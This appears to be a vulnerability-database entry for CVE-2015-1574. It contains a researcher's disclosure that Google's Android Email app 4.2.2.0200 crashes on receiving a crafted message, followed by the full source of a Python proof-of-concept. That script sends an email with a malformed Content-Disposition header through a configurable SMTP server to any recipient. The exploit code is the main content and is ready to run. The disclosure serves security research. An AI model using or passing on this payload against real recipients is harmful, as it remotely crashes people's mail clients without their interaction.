| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| Google Email Application for Android Denial of Service Vulnerability | 21 Feb 201500:00 | – | cnvd | |
| CVE-2015-1574 | 15 Feb 201520:00 | – | cve | |
| CVE-2015-1574 | 15 Feb 201520:00 | – | cvelist | |
| EUVD-2015-1706 | 7 Oct 202500:30 | – | euvd | |
| CVE-2015-1574 | 15 Feb 201520:59 | – | nvd | |
| Information disclosure | 15 Feb 201520:59 | – | prion | |
| CVE-2015-1574 - Google Email App 4.2.2 remote denial of service | 22 Feb 201500:00 | – | securityvulns | |
| Google mail application DoS | 22 Feb 201500:00 | – | securityvulns | |
| Crashing Google Email App for Android Just By Sending a Malicious Email | 17 Feb 201520:29 | – | thn |
`Summary:
A bug in the stock Google email application version 4.4.2.0200 has been
found. An attacker can remotely perform an Denial Of Service attack by
sending a specially crafted email. No interaction from the user is
needed to produce the crash just receive the malicious email.
The CVE-2015-1574 has been assigned. Version 4.2.2.0200 running on a
Samsung Galaxy 4 mini fully updated (19 Jan 2015) is affected. Newer
versions 4.2.2.0400 are not affected.
Details and proof of concept exploit at:
http://hmarco.org/bugs/google_email_app_4.2.2_denial_of_service.html
Regards,
Hector Marco.
http://hmarco.org
----------------
Exploit crash_Android_Google_email_4.2.2.0200.py:
#!/usr/bin/python
'''
* $FILE: crash_Android_Google_email_4.2.2.0200.py
*
* $VERSION$
*
* Authors: Hector Marco <[email protected]>
* Ismael Ripoll <[email protected]>
*
* Date: Released 07 Jan 2015
*
* Attack details: http://hmarco.org
*
* $LICENSE:
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
'''
import smtplib
from smtplib import SMTPException
import sys
import getopt
#### START CONFIGURE #####
smtpServer = "" # set an appropriate SMTP server
smtpServerPort = 25 # SMTP port, default 25
#### END CONFIGURE #####
sender = ''
receivers = []
def usage():
print '\n$ %s -s [email protected] -r [email protected]\n' % sys.argv[0]
sys.exit(2)
def smtpNotConfigured():
print '\n[-] Error: Edit this script and set a SMTP server to send emails\n'
sys.exit(2)
def printHeader():
print "\nEmail Android Google 4.2.2.0200 crasher"
print "======================================="
print "Author: Hector Marco <[email protected]>"
print "Website: http://hmarco.org"
def main(argv):
global sender
global receivers
try:
opts, args = getopt.getopt(argv,"hs:r:",["s=","r="])
if len(sys.argv) == 1:
usage()
except getopt.GetoptError:
usage()
for opt, arg in opts:
if opt == '-h':
usage()
elif opt in ("-s", "--sender"):
sender = arg
elif opt in ("-r", "--receiver"):
receivers.append(arg)
if __name__ == "__main__":
printHeader()
if len(smtpServer) == 0:
smtpNotConfigured()
main(sys.argv[1:])
message = "From: Sender <%s>\n" % sender
message += "To: Receiver <%s>\n" % receivers[0]
message += """Subject: Crash test
Content-Type: text/plain
Content-Transfer-Encoding: 8BIT
Content-Disposition: ;
"""
print "\n[+] Sending crafted message to: %s" % receivers[0]
try:
smtpObj = smtplib.SMTP(smtpServer, int(smtpServerPort));
smtpObj.sendmail(sender, receivers, message)
print "[+] Malicious email successfully sent."
except SMTPException:
print "[-] Error: unable to send the email. Invalid SMTP server ???"
sys.exit(2)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation